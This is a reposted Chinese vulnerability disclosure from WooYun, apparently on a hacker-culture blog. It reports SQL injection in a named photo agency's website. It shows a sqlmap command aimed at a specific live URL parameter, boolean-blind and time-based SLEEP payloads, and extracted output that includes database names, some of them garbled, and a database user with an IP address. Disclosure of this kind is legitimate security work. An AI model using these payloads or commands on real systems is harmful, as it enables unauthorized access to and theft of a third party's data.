记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

cfp视觉中国存在SQL注入漏洞(敏感信息泄露)

2015-09-01 01:35

code 区域
CFP汉华易美存在SQL注入漏洞.数据库信息  用户信息等泄露

漏洞证明:

code 区域
sqlmap.py -u http://www.cfp.cn/index/topiclist?tpid=10526 --dbs



Parameter: tpid (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: tpid=10526 AND 1834=1834



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: tpid=10526 AND (SELECT * FROM (SELECT(SLEEP(5)))GPLE)

---

[11:35:53] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.4.12

back-end DBMS: MySQL 5.0.12



available databases [9]:

[*] `^L@);sePcg`

[*] `izd`t`

[*] `mysql"`

[*] `o?QYlT`

[*] `perform n@e_pcfema`

[*] `ph

BI`

[*] `tg_ci\k`

[*] information_schema

[*] tert



database management system users [1]:

[*] 'photo'@'219.239.94.150'

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0126405

阅读:85063 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“cfp视觉中国存在SQL注入漏洞(敏感信息泄露)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云